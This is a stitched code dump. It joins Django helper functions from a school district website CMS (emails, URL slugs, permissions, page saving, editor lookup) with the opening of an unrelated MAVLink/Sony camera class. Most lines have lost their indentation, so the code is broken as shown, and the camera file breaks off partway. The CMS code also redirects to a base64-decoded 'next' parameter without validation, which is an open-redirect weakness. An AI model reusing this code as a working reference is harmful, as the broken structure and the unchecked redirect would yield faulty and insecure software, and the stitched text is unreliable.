self.node_type, self.content_type),
('<p><strong>Previous URL:</strong> ' + oldurl + '</p>'
'<p><strong>New URL:</strong> ' + self.url + '</p>'),
'Salt Lake City School District <webmaster@slcschools.org>',
['jordan.collins@slcschools.org'],
reply_to=['donotreply@slcschools.org'],
headers={'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8]},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def filepath_email(self, oldpath, newpath):
email = EmailMessage(
'File Path Changed: App {0} Type {1}'.format(
self.parent.node_type, self.parent.content_type),
('<p><strong>Previous Path:</strong> ' + oldpath + '</p>'
'<p><strong>New Path:</strong> ' + newpath + '</p>'),
'Salt Lake City School District <webmaster@slcschools.org>',
['jordan.collins@slcschools.org'],
reply_to=['donotreply@slcschools.org'],
headers={'Message-ID': str(self.pk) + '-' + str(uuid.uuid4())[0:8]},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def failed_saml_login_email(username):
email = EmailMessage(
'Failed SAML Login',
'An attempt to login via SAML has failed for username: {0}'.format(
username
),
'Salt Lake City School District <webmaster@slcschools.org>',
['jordan.collins@slcschools.org'],
reply_to=['donotreply@slcschools.org'],
headers={'Message-ID': str(uuid.uuid4())},
)
email.content_subtype = 'html'
try:
email.send(fail_silently=False)
except Exception:
return False
return True
def findfileext_media(media):
media = media.split('/')[-1:]
return os.path.splitext(media[0])
def urlclean_fileext(fileext):
return re.sub(
'-+', '-', re.sub(r'([\s+])', '-', re.sub(
r'([^.a-z0-9\s-])', '', fileext.lower())))
def urlclean_objname(objname):
return re.sub(
'-+', '-', re.sub(r'([\s+])', '-', re.sub(
r'([^a-z0-9\s-])', '', objname.lower())))
def urlclean_remdoubleslashes(objname):
return re.sub('/+', '/', objname.lower())
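# Hedged, illustrative examples of the slug/URL helpers above (never called in
# production code; kept only as executable documentation):
def _urlclean_examples():
    assert urlclean_objname('Hello,  World!') == 'hello-world'
    assert urlclean_fileext('My File.PDF') == 'my-file.pdf'
    assert urlclean_remdoubleslashes('/a//b///c/') == '/a/b/c/'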
def silentdelete_media(media):
try:
if os.path.isfile(media):
os.remove(media)
elif os.path.isdir(media):
shutil.rmtree(media, ignore_errors=True)
except OSError:
pass
def silentmove_media(oldpath, newpath):
try:
        if not (os.path.isdir(oldpath) and os.path.isdir(newpath)):
            with open('/tmp/movingfile.txt', 'a') as f:
                f.write('Moving: ' + oldpath + ' To: ' + newpath + '\n')
            shutil.move(oldpath, newpath)
        else:
            try:
                with open('/tmp/movingfile.txt', 'a') as f:
                    f.write('Removing: ' + oldpath + '\n')
                os.rmdir(oldpath)
except OSError:
pass
except OSError:
pass
def has_add_permission(self, request, obj=None):
# Prevent showing the Save and Add Another Option
if request.path.split('/')[-2:][0] == 'change':
return False
if request.user.has_perm(
self.model._meta.app_label + '.' + get_permission_codename(
'add', self.model._meta)):
return True
elif request.user.groups.filter(name='Website Managers'):
return True
elif request.site.dashboard_sitepublisher_site.filter(account=request.user.pk):
return True
elif obj:
if get_permission_codename(
'add', self.model._meta) in get_perms(request.user, obj):
return True
return False
def has_change_permission(self, request, obj=None):
if self is not None:
# Check for regular global model permission
if request.user.has_perm(
self.model._meta.app_label + '.' + get_permission_codename(
'change', self.model._meta)):
return True
elif request.user.groups.filter(name='Website Managers'):
return True
elif request.site.dashboard_sitepublisher_site.filter(account=request.user.pk):
return True
if obj:
if request.user.is_authenticated:
if request.user.pk in can_edit_page(obj):
return True
# if request.user.groups.filter(name='Website Managers'):
# return True
# elif request.site.dashboard_sitepublisher_site.filter(account=request.user.pk):
# return True
# if obj.has_permissions:
# # Check for object level permission through Guardian
# if get_permission_codename(
# 'change', obj._meta) in get_perms(request.user, obj):
# return True
# else:
# node = objectfindnode(obj)
# permission_point = nodefindobject(
# node.get_ancestors().filter(has_permissions=True).last())
# if get_permission_codename(
# 'change', permission_point._meta) in get_perms(
# request.user, permission_point):
# return True
return False
def has_delete_permission(self, request, obj=None):
if request.user.has_perm(
self.model._meta.app_label + '.' + get_permission_codename(
'trash', self.model._meta)):
return True
elif request.user.groups.filter(name='Website Managers'):
return True
elif obj:
if obj.has_permissions:
# Check for object level permission through Guardian
if get_permission_codename(
'trash', self.model._meta) in get_perms(request.user, obj):
return True
else:
node = objectfindnode(obj)
permission_point = nodefindobject(
node.get_ancestors().filter(has_permissions=True).last())
if get_permission_codename(
'trash', permission_point._meta) in get_perms(
request.user, permission_point):
return True
return False
def has_add_permission_inline(self, request, obj=None):
# Allow if object is new (should always be new)
if obj is None:
return True
return False
def has_change_permission_inline(self, request, obj=None):
return True
def has_delete_permission_inline(self, request, obj=None):
return True
def modeltrash(self, *args, **kwargs):
if self.deleted == 0:
self.deleted = True
self.save()
else:
super(self._meta.model, self).delete()
def movechildren(self):
children = self.get_children()
for child in children:
if child.content_type == 'Board':
child.board.save()
elif child.content_type == 'BoardSubPage':
child.boardsubpage.save()
# Upload Image Functions
def image_upload_to(instance, filename):
original_file, original_extension = findfileext_media(filename)
full_path = '{0}{1}'.format(
instance.pk,
original_extension,
)
full_path = full_path.lower()
if not instance.image_file._committed:
silentdelete_media(settings.MEDIA_ROOT + '/' + full_path)
return full_path
# Upload File Functions
def file_upload_to(instance, filename):
original_file, original_extension = findfileext_media(filename)
full_path = '{0}{1}'.format(
instance.pk,
original_extension,
)
full_path = full_path.lower()
if not instance.file_file._committed:
silentdelete_media(settings.MEDIA_ROOT + '/' + full_path)
return full_path
def precinct_map_upload_to(instance, filename):
pass
# Save Content Functions
def modelsave(self, *args, **kwargs):
if not self.site:
if self.parent:
self.site = self.parent.site
else:
raise Exception('site not set for object. cannot be saved.')
Node = apps.get_model('objects', 'node')
User = apps.get_model('objects', 'user')
Alias = apps.get_model('multisite', 'alias')
# Is this a new instance?
is_new = self._state.adding
# Set deleted prefix
is_deleted = '_' if self.deleted is True else ''
# Set UUID if None
self.uuid = self.uuid if self.uuid else uuid.uuid4()
# Set original date on event
try:
if self._meta.get_field('originaldate'):
if (not self.originaldate) and self.startdate:
self.originaldate = self.startdate
self.originalinstance = len(self._meta.model.objects.filter(
originaldate=self.originaldate)) + 1
except FieldDoesNotExist:
pass
# Create Parent
if self.PARENT_TYPE:
creator = User.objects.get(username='webmaster@slcschools.org')
self.parent = self.create_parent(creator=creator)
# Force Parent
if self.PARENT_URL:
try:
self.parent = Node.objects.exclude(
uuid=self.uuid).get(url=self.PARENT_URL, site=self.site)
except Node.DoesNotExist:
pass
# Related Node matches Parent
try:
if self._meta.get_field('related_node'):
self.related_node = self.parent
except FieldDoesNotExist:
pass
# Force Title
self.title = self.force_title()
# Set Slug
self.slug = urlclean_objname(self.title)
if not self.sluginstance:
self.sluginstance = 0
# Set URL
urlchanged = False
parent_url = self.parent.url if self.parent else self.PARENT_URL
oldurl = self.url
self.url = urlclean_remdoubleslashes('/{0}/{1}/{2}{3}{4}/'.format(
parent_url,
self.URL_PREFIX,
is_deleted,
urlclean_objname(self.slug),
'' if self.sluginstance == 0 else '-{0}'.format(self.sluginstance),
)
)
while Node.objects.filter(site=self.site).filter(url=self.url).exclude(
pk=self.pk).count() >= 1:
self.sluginstance += 1
self.url = urlclean_remdoubleslashes('/{0}/{1}/{2}{3}{4}/'.format(
parent_url,
self.URL_PREFIX,
is_deleted,
urlclean_objname(self.slug),
'' if self.sluginstance == 0 else '-{0}'.format(self.sluginstance),
)
)
if not is_new and (oldurl != self.url):
urlchanged = True
Thread(target=urlchanged_email, args=(self, oldurl)).start()
# # Set new name for file fields
# currentname = None
# newname = None
# # Image file field
# try:
# if self.image_file:
# currentname = findfileext_media(self.image_file.name)
# newname = image_upload_to(self, currentname[0] + currentname[1])
# currentname = '{0}/{1}{2}'.format(
# '/'.join(newname.split('/')[:-1]),
# currentname[0],
# currentname[1],
# )
# self.image_file.name = newname
# except AttributeError:
# pass
# # File file field
# try:
# if self.file_file:
# currentname = findfileext_media(self.file_file.name)
# newname = file_upload_to(self, currentname[0] + currentname[1])
# currentname = '{0}/{1}{2}'.format(
# '/'.join(newname.split('/')[:-1]),
# currentname[0],
# currentname[1],
# )
# self.file_file.name = newname
# except AttributeError:
# pass
# Set the node_title for the node
self.node_title = self.title
# Set the node type
self.node_type = self._meta.app_label
# Set the content type
self.content_type = self._meta.model_name
# if not self.menu_title:
# self.menu_title = self.title
# Set school year for events
try:
if self._meta.get_field('schoolyear'):
self.schoolyear = str(
currentyear(self.startdate)['currentyear']['long']
)
except FieldDoesNotExist:
pass
# Set yearend for events
if self.node_type == 'events':
try:
if self._meta.get_field('yearend'):
self.schoolyear = str(
currentyear(self.startdate)['currentyear']['short']
)
except FieldDoesNotExist:
pass
# Does this item have permissions?
if self.HAS_PERMISSIONS:
self.has_permissions = True
else:
self.has_permissions = False
# Fix richtext anchor tags
for field in self._meta.fields:
if field.__class__ == RichTextField:
field_value = getattr(self, field.name)
if field_value:
links = re.findall(r'<a .*?</a>', field_value)
for link in links:
try:
url = re.search(
r'(?:href)=\"(.*?)\"',
link,
).groups()[0]
except AttributeError:
url = ''
try:
data_processed = re.search(
r'(?:data-processed)=\"(.*?)\"',
link,
).groups()[0]
except AttributeError:
data_processed = ''
if url != data_processed:
url_parsed = urlparse(url)
try:
site = Alias.objects.get(
domain=url_parsed.netloc).site
except Alias.DoesNotExist:
site = None
try:
if site:
node = Node.objects.get(
url=url_parsed.path, site=site)
else:
node = None
except Node.DoesNotExist:
node = None
rx = r'{0}'.format(link)
rr = link
if node:
rr = re.sub(r'data-id=\".*?\"',
'data-id="{0}"'.format(str(node.pk)), rr)
else:
rr = re.sub(r'data-id=\".*?\"',
'data-id="{0}"'.format(''), rr)
rr = re.sub(r'data-processed=\".*?\"',
'data-processed="{0}"'.format(url), rr)
rr = re.sub(r'[ ]+', ' ', rr)
field_value = re.sub(re.escape(rx), rr, field_value)
images = re.findall(r'<img .*? />', field_value)
for image in images:
try:
url = re.search(
r'(?:src)=\"(.*?)\"',
image,
).groups()[0]
except AttributeError:
url = ''
try:
data_processed = re.search(
r'(?:data-processed)=\"(.*?)\"',
image,
).groups()[0]
except AttributeError:
data_processed = ''
if url != data_processed:
url_parsed = urlparse(url)
try:
site = Alias.objects.get(
domain=url_parsed.netloc).site
except Alias.DoesNotExist:
site = None
try:
if site:
node = Node.objects.get(
url=url_parsed.path, site=site)
else:
node = None
except Node.DoesNotExist:
node = None
rx = r'{0}'.format(image)
rr = image
if node:
rr = re.sub(r'data-id=\".*?\"',
'data-id="{0}"'.format(str(node.pk)), rr)
else:
rr = re.sub(r'data-id=\".*?\"',
'data-id="{0}"'.format(''), rr)
rr = re.sub(r'data-processed=\".*?\"',
'data-processed="{0}"'.format(url), rr)
rr = re.sub(r'[ ]+', ' ', rr)
field_value = re.sub(re.escape(rx), rr, field_value)
setattr(self, field.name, field_value)
# Set Link URL to absolute URL
try:
if self._meta.get_field('link_url'):
self.link_url = link_url_absolute(self)
except FieldDoesNotExist:
pass
# Save the item
super(self._meta.model, self).save(*args, **kwargs)
# Set the section page count
if self.pagelayout.namespace == 'site-section.html':
node = objectfindnode(self)
node.section_page_count = len(
self
.get_children()
.filter(
node_type='pages',
content_type='page',
published=True,
deleted=False,
)
.exclude(
pagelayout__namespace='site-section.html',
)
)
node.save()
else:
node = objectfindnode(self)
node.section_page_count = 1
if self.parent:
if self.parent.pagelayout.namespace == 'site-section.html':
self.parent.section_page_count = len(
self.parent
.get_children()
.filter(
node_type='pages',
content_type='page',
published=True,
deleted=False,
)
.exclude(
Q(pagelayout__namespace='site-section.html') |
Q(pk=self.pk),
)
)
if self.published and not self.deleted:
self.parent.section_page_count += 1
self.parent.save()
node.save()
# # Move Directories for children then parent.
if urlchanged:
# Save Children to update their urls and move thier directories.
for child in self.get_children():
object = nodefindobject(child)
object.save()
# # Move Directory
# silentmove_media(
# settings.MEDIA_ROOT + oldurl,
# settings.MEDIA_ROOT + self.url
# )
# # Move File
# if currentname != newname:
# oldpath = '{0}/{1}'.format(settings.MEDIA_ROOT, currentname)
# newpath = '{0}/{1}'.format(settings.MEDIA_ROOT, newname)
# silentmove_media(oldpath, newpath)
# # Commenting file moves because newly uploaded files
# # think they are moving on upload.
# # filepath_email(self, oldpath, newpath)
related_resource_links(self)
clearcache(self)
# Model Inheritance Object
def nodefindobject(node):
return apps.get_model(
node.node_type + '.' + node.content_type).objects.get(pk=node.pk)
def objectfindnode(object):
Node = apps.get_model('objects', 'node')
return Node.objects.get(pk=object.pk)
# MPTT Tree Functions
def resetchildrentoalphatitle():
Node = apps.get_model('objects', 'node')
top = Node.objects.filter(node_type='pages').get(
node_title='Charter Schools')
children = top.get_children()
children = children.order_by('node_title')
parent = children[0]
parent.move_to(top, position='first-child')
for child in children[1:]:
parent = Node.objects.get(pk=parent.pk)
child = Node.objects.get(pk=child.pk)
child.move_to(parent, position='right')
        print('Moving {0} after {1}'.format(child, parent))
parent = child
# Cache Functions
def clearcache(object):
pass
def save_formset(self, request, form, formset, change):
# formset.save() returns instances but
# I do not need them so I am not storing them.
formset.save(commit=False)
for obj in formset.deleted_objects:
obj.delete()
for obj in formset.new_objects:
obj.create_user = request.user
obj.update_user = request.user
obj.site = request.site
try:
if not obj.primary_contact:
obj.primary_contact = request.user
except AttributeError:
pass
obj.save()
for obj in formset.changed_objects:
obj[0].update_user = request.user
obj[0].save()
formset.save_m2m()
def save_model(self, request, obj, form, change):
if getattr(obj, 'create_user', None) is None:
obj.create_user = request.user
obj.update_user = request.user
if getattr(obj, 'site', None) is None:
obj.site = request.site
super(self.__class__, self).save_model(request, obj, form, change)
def response_change(self, request, obj):
if 'next' in request.GET:
opts = self.model._meta
pk_value = obj._get_pk_val()
preserved_filters = self.get_preserved_filters(request)
msg_dict = {
'name': force_text(opts.verbose_name),
'obj': format_html(
'<a class="editlink" href="{}">{}</a>',
urlquote(request.path), obj),
}
if "_continue" in request.POST:
msg = format_html(
_('The {name} "{obj}" was changed successfully.'
'You may edit it again below.'),
**msg_dict
)
self.message_user(request, msg, messages.SUCCESS)
redirect_url = request.get_full_path()
redirect_url = add_preserved_filters({
'preserved_filters': preserved_filters,
'opts': opts}, redirect_url)
return HttpResponseRedirect(redirect_url)
if '_continue' not in request.POST:
msg = format_html(
_('The {name} "{obj}" was changed successfully.'),
**msg_dict
)
self.message_user(request, msg, messages.SUCCESS)
return HttpResponseRedirect(
base64.b64decode(request.GET['next']).decode('utf-8'))
return super(self.__class__, self).response_change(request, obj)
def get_management_website():
Site = apps.get_model('sites', 'site')
try:
return Site.objects.only('pk').get(name='Website Management').pk
except Site.DoesNotExist:
return ''
def get_district_office():
Location = apps.get_model('taxonomy', 'location')
try:
return Location.objects.only('pk').get(title='District Office').pk
except Location.DoesNotExist:
return ''
def get_districtcalendareventcategory_general():
DistrictCalendarEventCategory = apps.get_model(
'taxonomy',
'districtcalendareventcategory'
)
try:
return DistrictCalendarEventCategory.objects.only('pk').get(
title='General Event').pk
except DistrictCalendarEventCategory.DoesNotExist:
return ''
def get_webmaster(pk=True):
User = apps.get_model('objects', 'user')
try:
webmaster = User.objects.get(username='webmaster@slcschools.org')
if pk:
return webmaster.pk
else:
return webmaster
except User.DoesNotExist:
return ''
def get_default_pagelayout(pk=True):
PageLayout = apps.get_model('dashboard', 'pagelayout')
try:
layout = PageLayout.objects.get(title='Default')
if pk:
return layout.pk
else:
return layout
except PageLayout.DoesNotExist:
return ''
def get_contactpage(request, pk=True):
Node = apps.get_model('objects', 'node')
try:
page = Node.objects.get(node_title='Contact Us', site=request.site)
if pk:
return page.pk
else:
return page
except Node.DoesNotExist:
return ''
def currentyear(date=None):
    # Evaluate the default at call time; a default of timezone.now() in the
    # signature would be frozen at import.
    if date is None:
        date = timezone.now()
    if date.month >= 7:
currentyearkey = date.year + 1
currentyearstring = str(date.year) + '-' + str(date.year + 1)[2:]
else:
currentyearkey = date.year
currentyearstring = str(date.year - 1) + '-' + str(date.year)[2:]
currentyear = {"short": currentyearkey, "long": currentyearstring}
return {'currentyear': currentyear}
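# Illustrative (hedged) examples of currentyear(); July-December roll into the
# next school year, January-June stay in the current one:
#   currentyear(timezone.datetime(2021, 9, 1)) -> {'currentyear': {'short': 2022, 'long': '2021-22'}}
#   currentyear(timezone.datetime(2022, 3, 1)) -> {'currentyear': {'short': 2022, 'long': '2021-22'}}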
def next_tuesday_sixthrity():
    # Return the upcoming Tuesday at 18:30 (6:30 PM) as an aware datetime.
now = timezone.datetime.strptime(
timezone.datetime.now().strftime('%Y-%m-%d %H:%M'), '%Y-%m-%d %H:%M')
while now.weekday() != 1:
now += timedelta(days=1)
now += timedelta(hours=18 - int(now.strftime('%H')))
now += timedelta(minutes=30 - int(now.strftime('%M')))
return timezone.make_aware(now)
def tomorrow_midnight():
now = timezone.datetime.strptime(
timezone.datetime.now().strftime('%Y-%m-%d %H:%M'), '%Y-%m-%d %H:%M')
now += timedelta(days=1)
now += timedelta(hours=0 - int(now.strftime('%H')))
now += timedelta(minutes=0 - int(now.strftime('%M')))
return timezone.make_aware(now)
def december_thirty_first():
now = timezone.datetime.strptime(
timezone.datetime.now().strftime('%Y-%m-%d %H:%M'), '%Y-%m-%d %H:%M')
return timezone.make_aware(
timezone.datetime(now.year, 12, 31, 00, 00)
)
def file_name(self):
    if (
        self.parent.node_type == 'documents' and
        self.parent.content_type in (
            'document',
            'policy',
            'administrativeprocedure',
            'supportingdocument',
            'boardmeetingexhibit',
            'boardmeetingagendaitem',
        )
    ):
return '{0}-{1}{2}'.format(
self.parent.slug,
self.slug,
findfileext_media(self.file_file.url)[1],
)
    if (
        self.parent.node_type == 'documents' and
        self.parent.content_type in (
            'boardmeetingagenda',
            'boardmeetingminutes',
        )
    ):
return '{0}-{1}-{2}{3}'.format(
self.parent.parent.slug,
self.parent.slug,
self.slug,
findfileext_media(self.file_file.url)[1],
)
    if (
        self.parent.node_type == 'documents' and
        self.parent.content_type in (
            'boardmeetingaudio',
            'boardmeetingvideo',
        )
    ):
return '{0}-{1}{2}'.format(
self.parent.parent.slug,
self.parent.slug,
findfileext_media(self.file_file.url)[1],
)
    if (
        self.node_type == 'images' and
        self.content_type in (
            'thumbnail',
            'newsthumbnail',
            'pagebanner',
            'contentbanner',
            'profilepicture',
            'districtlogogif',
            'districtlogojpg',
            'districtlogopng',
            'districtlogotif',
            'districtlogo',
            'photogalleryimage',
            'inlineimage',
        )
    ):
return '{0}{1}'.format(
self.slug,
findfileext_media(self.image_file.url)[1],
)
    if (
        self.node_type == 'files' and
        self.content_type == 'precinctmap'
    ):
return '{0}{1}'.format(
self.slug,
findfileext_media(self.file_file.url)[1],
)
customerror_emailadmins(
'Missing File Name',
'Missing file name for: '
'{0} with node type: {1} and content type: {2}'.format(
self.pk,
self.node_type,
self.content_type,
)
)
    return 'unknown'
def name_dot_field_dot_ext(generator):
"""
A namer that, given the following source file name::
photos/thumbnails/bulldog.jpg
will generate a name like this::
/path/to/generated/images/{image.pk}.{specfield}.{ext}
where "/path/to/generated/images/" is the value specified by the
``IMAGEKIT_CACHEFILE_DIR`` setting.
"""
source_filename = getattr(generator.source, 'name', None)
if 'specfield' in generator.options:
specfield = generator.options['specfield']
else:
raise Exception('Spec Field Options Must Include Spec Field Name.')
    cache_dir = settings.IMAGEKIT_CACHEFILE_DIR
    ext = suggest_extension(source_filename or '', generator.format)
    basename = os.path.basename(source_filename)
    returnpath = os.path.normpath(os.path.join(cache_dir, '%s.%s%s' % (
        os.path.splitext(basename)[0], specfield, ext)))
return returnpath
def related_resource_links(self):
if self.node_type == 'pages' and self.content_type == 'school':
if self.website_url:
link, created = self.links_resourcelink_node.get_or_create(
related_locked='website_url',
parent=self,
site=self.site,
defaults={
'title': 'School Website',
'link_url': self.website_url,
'related_locked': True,
}
)
link.title = 'School Website'
link.link_url = self.website_url
link.related_locked = 'website_url'
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = False
link.published = True
link.save()
else:
try:
link = self.links_resourcelink_node.get(
related_locked='website_url'
)
if link:
link.published = False
link.delete()
except self.links_resourcelink_node.model.DoesNotExist:
pass
if self.scc_url:
link, created = self.links_resourcelink_node.get_or_create(
related_locked='scc_url',
parent=self,
site=self.site,
defaults={
'title': 'School Community Council',
'link_url': self.scc_url,
'related_locked': True,
}
)
link.title = 'School Community Council'
link.link_url = self.scc_url
link.related_locked = 'scc_url'
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = False
link.published = True
link.save()
else:
try:
link = self.links_resourcelink_node.get(
related_locked='scc_url'
)
if link:
link.published = False
link.delete()
except self.links_resourcelink_node.model.DoesNotExist:
pass
if self.calendar_url:
link, created = self.links_resourcelink_node.get_or_create(
related_locked='calendar_url',
parent=self,
site=self.site,
defaults={
'title': 'School Calendar',
'link_url': self.calendar_url,
'related_locked': True,
}
)
link.title = 'School Calendar'
link.link_url = self.calendar_url
link.related_locked = 'calendar_url'
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = False
link.published = True
link.save()
else:
try:
link = self.links_resourcelink_node.get(
related_locked='calendar_url'
)
if link:
link.published = False
link.delete()
except self.links_resourcelink_node.model.DoesNotExist:
pass
if self.donate_url:
link, created = self.links_resourcelink_node.get_or_create(
related_locked='donate_url',
parent=self,
site=self.site,
defaults={
'title': 'Make a Donation',
'link_url': self.donate_url,
'related_locked': True,
}
)
link.title = 'Make a Donation'
link.link_url = self.donate_url
link.related_locked = 'donate_url'
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = False
link.published = True
link.save()
else:
try:
link = self.links_resourcelink_node.get(
related_locked='donate_url'
)
if link:
link.published = False
link.delete()
except self.links_resourcelink_node.model.DoesNotExist:
pass
if self.node_type == 'documents' and self.content_type == 'document':
link, created = self.parent.links_resourcelink_node.get_or_create(
related_locked=str(self.uuid),
parent=self.parent,
site=self.site,
defaults={
'title': self.title,
'link_url': self.url,
'related_locked': True,
}
)
link.title = self.title
link.link_url = self.url
link.related_locked = str(self.uuid)
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = self.deleted
link.published = self.published
doc_len = len(
self
.files_file_node
.filter(deleted=0)
.filter(published=1)
.filter(file_file__isnull=False)
)
if doc_len < 1:
link.published = False
elif doc_len > 1:
link.published = self.published
link.modal_ajax = True
link.target_blank = False
else:
link.published = self.published
link.modal_ajax = False
link.target_blank = True
link.save()
if self.node_type == 'pages' and self.content_type == 'subpage':
link, created = self.parent.links_resourcelink_node.get_or_create(
related_locked=str(self.uuid),
parent=self.parent,
site=self.site,
defaults={
'title': self.title,
'link_url': self.url,
'related_locked': True,
}
)
link.title = self.title
link.link_url = self.url
link.related_locked = str(self.uuid)
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = self.deleted
link.published = self.published
link.save()
if self.node_type == 'pages' and self.content_type == 'boardsubpage':
link, created = self.parent.links_resourcelink_node.get_or_create(
related_locked=str(self.uuid),
parent=self.parent,
site=self.site,
defaults={
'title': self.title,
'link_url': self.url,
'related_locked': True,
}
)
link.title = self.title
link.link_url = self.url
link.related_locked = str(self.uuid)
link.related_type = '{0}-{1}'.format(
self.node_type,
self.content_type,
)
link.deleted = self.deleted
link.published = self.published
link.save()
if self.node_type == 'files':
related_resource_links(nodefindobject(self.parent))
def get_domain(site):
if settings.ENVIRONMENT_MODE == "development":
try:
site = Alias.objects.get(domain__contains='-dev', site=site)
except Alias.DoesNotExist:
pass
if settings.ENVIRONMENT_MODE == "test":
try:
site = Alias.objects.get(domain__contains='-test', site=site)
except Alias.DoesNotExist:
pass
return site.domain
def is_siteadmin(request):
if (
request.user.is_superuser or
request.user.groups.filter(name='Website Managers') or
request.site.dashboard_sitepublisher_site.filter(
account=request.user.pk)
):
return True
return False
def is_globaladmin(request):
if (
request.user.is_superuser or
request.user.groups.filter(name='Website Managers')
):
return True
return False
def link_url_absolute(self):
input_url = urlsplit(self.link_url)
working_url = list(input_url)
if self.link_url:
if not working_url[1]:
working_url[0] = 'https'
working_url[1] = self.site.domain
return urlunsplit(working_url)
def can_edit_page(node):
# Get Required Models
Employee = apps.get_model('users', 'Employee')
PageEditor = apps.get_model('users', 'PageEditor')
# Define the ordered dic to track all users
all_users = OrderedDict()
# Find all superusers
for username in (
Employee
.objects
.filter(
is_active=1,
deleted=0,
published=1,
is_superuser=1)
.values('pk', 'username')
):
if username['pk'] in all_users:
all_users[username['pk']]['roles'].append('superuser')
else:
all_users[username['pk']] = {
'username': username['username'], 'roles': ['superuser']}
# Find all website managers
for username in (
Employee
.objects
.filter(
is_active=1,
deleted=0,
published=1,
groups__name='Website Managers'
)
.values('pk', 'username')
):
if username['pk'] in all_users:
all_users[username['pk']]['roles'].append('website_manager')
else:
all_users[username['pk']] = {
'username': username['username'], 'roles': ['website_manager']}
# Final site publishers
for username in (
node
.site
.dashboard_sitepublisher_site
.all()
.only('account')
):
if username.account.is_active:
if username.account.pk in all_users:
all_users[username.account.pk]['roles'].append(
'site_publisher')
else:
all_users[username.account.pk] = {
'username': username.account.username, 'roles': ['site_publisher']}
# Find direct page editors for the node
for username in (
node
.users_pageeditor_node
.filter(
deleted=0,
employee__is_active=1,
employee__deleted=0,
employee__published=1
)
.values('employee__pk', 'employee__username')
):
if username['employee__pk'] in all_users:
all_users[username['employee__pk']]['roles'].append('page_editor')
else:
all_users[username['employee__pk']] = {
'username': username['employee__username'], 'roles': ['page_editor']}
# Find all parent nodes and their page editors
for node in (
node
.get_ancestors()
.filter(
deleted=0,
published=1
)
):
for username in (
node
.users_pageeditor_node
.filter(
deleted=0,
employee__is_active=1,
employee__deleted=0,
employee__published=1
)
.values('employee__pk', 'employee__username')
):
if username['employee__pk'] in all_users:
all_users[username['employee__pk']]['roles'].append(
'inherited_page_editor')
else:
all_users[username['employee__pk']] = {'username': username['employee__username'],
'roles': ['inherited_page_editor']}
# Return the ordered dict
return all_users
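
# ------------------------------------------------------------------------------------------------
# Usage sketch (hypothetical): a view or template helper can combine can_edit_page() with the
# admin checks above to answer "may this request edit this node?". The helper name is made up;
# it only calls functions defined in this file.
# ------------------------------------------------------------------------------------------------
def request_may_edit_node(request, node):
    # site and global admins are always allowed
    if is_siteadmin(request):
        return True
    # everyone else must appear in the per-node editor map built by can_edit_page()
    return request.user.pk in can_edit_page(node)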
|
alpha_set_hack.py
|
# ===============================================================================================================================
#
# Name : mavlinkSonyCamWriteVals.py
# Desc : Shared memory value class used to write MAVLink parameter values to the Sony camera
# Auth : AIR-obots Ai-Robots
#
# ===============================================================================================================================
#
# for parallel tasking of the camera action routines
#
# from multiprocessing import Process
import multiprocessing
# for debug
import logging
# for signal interrupt handling
import signal
# for the time.sleep() waits used in the get/set handshakes below
import time
class mavlinkSonyCamWriteVals():
STATE_INIT = 99
STATE_READY = 1
STATE_CAM_WRITING = 2
STATE_MAV_READING = 3
STATE_MAV_WRITING = 4
STATE_CAM_READING = 5
numberOfVals = 0
WRITE_PREV_DATA = 1
DONT_WRITE_PREV_DATA = 0
MAV_REQ_ALL_PARAM = 255
ParamStillCap = 1
ParamWhiteBala = 2
ParamShutSpd = 4
ParamIso = 8
ParamFocus = 16
ParamFocusArea = 32
ParamAperture = 64
ParamExPro = 128
def __init__ (self):
self.set_sony_iso = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_aperture = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_ex_pro = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_focus_area = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_focus = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_shutter = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_white_bal = mavlinkSonyCamWriteVals.STATE_INIT
self.set_sony_still_cap_mode = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_iso = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_aperture = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_ex_pro = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_focus_area = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_focus = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_shutter = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_white_bal = mavlinkSonyCamWriteVals.STATE_INIT
self.prev_sony_still_cap_mode = mavlinkSonyCamWriteVals.STATE_INIT
self.mav_req_all_param = 0
self.state = mavlinkSonyCamWriteVals.STATE_INIT
mavlinkSonyCamWriteVals.numberOfVals += 1 # global counter of the number of values
def __del__(self):
class_name = self.__class__.__name__
print('{} Deleted'.format(class_name))
def get_value_counter(self):
print('mavlink to sony writes has %d set-points' % (mavlinkSonyCamWriteVals.numberOfVals))
return mavlinkSonyCamWriteVals.numberOfVals
def init_class_state( self ):
if (self.state == mavlinkSonyCamWriteVals.STATE_INIT):
self.state = mavlinkSonyCamWriteVals.STATE_READY
def setVal_sony_iso(self,value,myId,mode=0,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = myId
if mode == 1:
self.prev_sony_iso = self.set_sony_iso
self.set_sony_iso = value
self.state = mavlinkSonyCamWriteVals.STATE_READY
return True
else:
return False
def getVal_sony_iso(self,YourID,timeout=20):
timeCnt = 0
while (not (self.state == mavlinkSonyCamWriteVals.STATE_READY)) and (timeCnt < timeout):
time.sleep(0.1)
timeCnt += 1
if (timeCnt < timeout):
self.state = YourID
print(' value: {} previous: {}'.format(self.set_sony_iso,self.prev_sony_iso))
self.state = mavlinkSonyCamWriteVals.STATE_READY
